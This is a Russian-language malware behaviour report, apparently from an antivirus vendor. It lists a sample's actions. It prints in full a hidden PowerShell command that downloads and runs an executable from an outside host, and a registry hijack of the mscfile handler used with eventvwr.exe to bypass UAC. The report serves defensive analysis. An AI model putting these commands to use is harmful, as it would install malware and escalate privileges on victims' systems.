Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://www.misshal.com/msword/lost2.exe как %temp%\\outlk.exe
Запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://www.misshal.com/msword/lost2.exe','%TEMP%\\outlk.exe') & reg add HKCU\\Software\\Classes\\mscf...
Завершает или пытается завершить
следующие системные процессы:
- %WINDIR%\syswow64\eventvwr.exe
Изменения в файловой системе
Создает следующие файлы
- nul
Сетевая активность
Подключается к
- 'mi##hal.com':80
- 'mi##hal.com':443
TCP
Запросы HTTP GET
- http://www.mi##hal.com/msword/lost2.exe
Другие
- 'mi##hal.com':443
UDP
- DNS ASK mi##hal.com
Другое
Запускает на исполнение
- '%WINDIR%\syswow64\reg.exe' add HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /d %TEMP%\\outlk.exe /f
- '%WINDIR%\syswow64\eventvwr.exe'
- '%WINDIR%\syswow64\mmc.exe' "<SYSTEM32>\eventvwr.msc" (со скрытым окном)
- '%WINDIR%\syswow64\ping.exe' -n 15 127.0.0.1
- '<SYSTEM32>\mmc.exe' "<SYSTEM32>\eventvwr.msc"
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://www.misshal.com/msword/lost2.exe','%TEMP%\\outlk.exe') & reg add HKCU\\Software\\Classes\\mscf... (со скрытым окном)
